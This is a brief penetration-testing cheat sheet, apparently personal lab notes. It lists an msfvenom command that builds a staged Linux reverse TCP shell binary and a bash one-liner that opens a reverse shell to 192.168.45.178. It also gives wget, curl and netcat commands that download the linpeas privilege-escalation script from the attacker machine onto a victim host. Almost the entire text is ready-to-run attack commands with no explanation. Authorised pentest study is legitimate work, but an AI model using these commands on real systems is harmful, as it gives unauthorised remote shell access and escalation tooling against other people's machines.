Miscellaneous
Using MSFVenom to create reverse shell
- Using staged payload for reverse_tcp
msfvenom --payload linux/x64/shell/reverse_tcp LHOST=192.168.45.178 LPORT=80 -f elf -o shell.elf
Reverse Shell Commands
- bash
bash -i >& /dev/tcp/192.168.45.178/80 0>&1
Download files in linux
1. Using wget
wget http://192.168.45.178:139/linpeas.sh -O linpeas.sh
2. Using curl
curl --output-dir /tmp/ -O http://192.168.45.178/linpeas.sh
3. Using netcat
in kali machine
cat linpeas.sh | nc -l -p 1234
in Victim Machine
nc Kali_IP 1234 > linpeas.sh